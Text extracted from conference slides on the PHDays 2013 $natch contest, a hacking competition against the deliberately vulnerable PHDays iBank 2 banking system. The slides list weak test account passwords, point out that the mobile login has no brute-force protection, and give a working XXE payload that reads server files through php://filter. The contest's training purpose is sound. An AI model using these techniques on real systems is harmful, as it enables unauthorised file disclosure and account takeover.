$NATCHSergey Scherbel & Yuriy DyachenkoPositive TechnologiesPositive Hack Days 2013
Some BackgroundThe competition took place for the first time at PHDays 2012.$natch aims at demonstrating the typical vulnerabilities ofonline banking systems.Positive Technologies performs security tests of online bankingsystems on a regular basis. We are really into it.The most interesting and dangerous vulnerabilities along withthe simply typical weaknesses are integrated into PHDaysiBank.
Last Year Results― 9 participants;― 4 winners;― the biggest winnings of 3,500roubles;― some winners got into the Positivecommunity ;(after an extremely scaryinterview of course).
PHDays iBank 2PHDays iBank 2 is NOT a real online banking system used byactual banks.The system was developed exclusively for the PHDays 2013competition.PHDays iBank 2 employs the typical vulnerabilities of onlinebanking systems.
Competition Rules― 100 bank clients;― 10 participants;― 20,000 roubles of prize money;― 1 day for source code analysis;― 30–40 minutes of the actual competition;― a participant will get as much money as he/she will manageto transfer to his/her account;― the participants can steal money from each other.
At WorkshopYou will be able:― to examine each vulnerability in detail;― to exploit vulnerabilities “by hand”;― to exploit vulnerabilities with various tools.Everything is performed on a special copy of the competitionsystem.
AuthenticationOne should enter the CAPTCHA to sign in.
Mobile Bank AuthenticationNo CAPTCHA here, thus the account bruteforce is possible.
Accounts with Simple Passwords100011:password100012:phdays100013:qwerty100014:password100015:123456100016:12345100017:11111100018:ninja100019:123123100020:sex100021:asdzxc100022:654321100023:iloveyou100024:root100025:master100026:superman...
Importing ContactsMost online banks have a feature that allows one to import/exportdata.
XML External EntityLoading of external entities is not disabled.http://php.net/libxml_disable_entity_loader
XML External Entity<?xml version="1.0" encoding="utf-8"?><!DOCTYPE contact [<!ENTITY x SYSTEM "php://filter/read=convert.base64-encode/resource=logs/changePassword.log">]><contacts><contact><name>name</name><account>90107430600712500003</account><description>&x;</description></contact></contacts>http://www.php.net/manual/en/wrappers.php.php